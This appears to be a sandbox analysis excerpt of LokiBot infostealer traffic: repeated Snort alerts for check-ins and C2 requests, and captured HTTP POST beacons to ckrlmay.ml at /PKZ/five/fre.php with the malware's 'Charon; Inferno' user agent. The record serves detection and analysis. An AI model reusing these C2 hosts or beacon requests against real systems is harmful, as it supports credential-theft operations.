            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49861 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49861 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49862 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49862 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49862 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49862 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49863 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49863 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49863 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49863 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49864 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49864 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49864 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49864 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49865 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49865 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49865 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49865 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49866 -> 104.28.4.154:80
            Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49866 -> 104.28.4.154:80
            Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49866 -> 104.28.4.154:80
            Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49866 -> 104.28.4.154:80
            Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49867 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49867 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49867 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49867 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49868 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49868 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49868 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49868 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49869 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49869 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49869 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49869 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49870 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49870 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49870 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49870 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49871 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49871 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49871 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49871 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49872 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49872 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49872 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49872 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49873 -> 104.28.4.154:80
            Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49873 -> 104.28.4.154:80
            Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49873 -> 104.28.4.154:80
            Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49873 -> 104.28.4.154:80
            Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49874 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49874 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49874 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49874 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49875 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49875 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49875 -> 172.67.187.13:80
            Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49875 -> 172.67.187.13:80
            Source: global traffic, HTTP traffic detected:
              POST /PKZ/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: ckrlmay.ml
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 499A343A
              Content-Length: 192
              Connection: close
            Source: global traffic, HTTP traffic detected:
              POST /PKZ/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: ckrlmay.ml
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 499A343A
              Content-Length: 165
              Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
